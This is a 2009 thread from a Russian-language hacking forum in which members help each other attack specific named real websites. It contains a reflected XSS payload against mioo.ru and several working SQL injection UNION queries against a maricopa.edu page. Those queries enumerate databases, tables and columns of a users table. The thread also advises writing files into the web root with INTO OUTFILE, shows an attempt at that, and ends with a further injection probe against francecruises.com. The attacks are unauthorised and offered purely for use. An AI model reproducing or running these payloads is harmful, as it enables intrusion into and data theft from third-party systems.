ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.05.2009, 22:48
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Сообщение от jecka3000
нашел активную xss на mioo. Но докрутить до конца никак не получается.....может быть кто нить объяснит, буду оочень благодарен:
http://www.mioo.ru/podrazdinfpage.php?id=10&prjid=640&ctree=cccccccc& onewnd=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Sca nner+Test%27%29%3C%2Fscript%3E%3C%22&list=tasks&ta skid=8&pv=no
та значения непосредственно в тег <script> вставляеться(и это пассивка а не активка):
PHP код:
http://www.mioo.ru/podrazdinfpage.php?id=10&prjid=640&ctree=cccccccc&onewnd=%27,%27%27);%20}%20alert(%22test%22);%20%3C/script%3E
|
|
|
23.05.2009, 22:55
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
PaCo, а можно поподробнее...)
|
|
|
|
23.05.2009, 23:13
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
В каком смысле поподробней? Я же дал рабочий пример, а дальше сам, пробел тока убери перед:
%3C/script%3E
|
|
|
|
24.05.2009, 02:21
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
Провел на форуме:
69162
Репутация:
0
|
|
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(column_name+using+lati n1),4,5,6,7,8+from+information_schema.columns+wher e+table_name=%27users%27/*
не получается конкретизировать запрос под определенную бд. получается высвечивает колонки всех бд с такой таблицей
статьи читаю, такого не нахожу
|
|
|
|
24.05.2009, 02:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(column_name)),4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273/*
тьфу, вопрос неправильно прочитал, сорри:
Текущая БД:
Код:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(database())),4,5,6,7,8/*
БД, в которых есть табла users:
Код:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(table_schema)),4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273/*
все таблицы из конркетно текущей БД:
Код:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(CONCAT_WS(0x3a,table_schema,table_name))),4,5,6,7,8+from+information_schema.tables+WHERE+table_schema=DATABASE()/*
Последний раз редактировалось Pashkela; 24.05.2009 в 02:38..
|
|
|
|
24.05.2009, 02:38
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от slammer
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(column_name+using+lati n1),4,5,6,7,8+from+information_schema.columns+wher e+table_name=%27users%27/*
не получается конкретизировать запрос под определенную бд. получается высвечивает колонки всех бд с такой таблицей
статьи читаю, такого не нахожу
Код:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(concat(column_name,0x3a,table_schema))),4,5,6,7,8+from+information_schema.columns+where+table_name='users'/*
Последний раз редактировалось R1dex; 24.05.2009 в 02:46..
|
|
|
|
24.05.2009, 02:43
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Там file_priv c неэкранированием кавычек, ищи путь до веб диры и лей через into dumpfile, тем более есть например drupal а там в базе в табличке конфигов лежит полный путь.
|
|
|
|
24.05.2009, 03:15
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
Провел на форуме:
69162
Репутация:
0
|
|
Сообщение от R1dex
Код:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(concat(column_name,0x3a,table_schema))),4,5,6,7,8+from+information_schema.columns+where+table_name='users'/*
спасибо, высвечивает хотябы привязанные к бд колоноки, разобраться можно)
Там file_priv c неэкранированием кавычек, ищи путь до веб диры и лей через into dumpfile, тем более есть например drupal а там в базе в табличке конфигов лежит полный путь.
буду пробовать
|
|
|
|
24.05.2009, 12:08
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от PaCo
Там file_priv c неэкранированием кавычек, ищи путь до веб диры и лей через into dumpfile, тем более есть например drupal а там в базе в табличке конфигов лежит полный путь.
...
Узнаем путь в файле phpinfo.php =)
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-1'+union+select+1,2,3,'qw',5,6,7,8+from+mysql.user +into+outfile+'/d0/www/sites/www.mcli.dist.maricopa.edu/htdocs/images/d012.jpg'+--+
Oops Access denied for user 'mcliweb'@'%' (using password: YES)
Т.ч. =(
...
|
|
|
|
24.05.2009, 13:57
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.francecruises.com/river62+order+by+12---.html
http://www.francecruises.com/river62+union+select+1,2,3,4,5,6,7,8,9,10,11,12---.html
Хелп... PS: не надо про блинд... Мне нужно вывод сделать. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
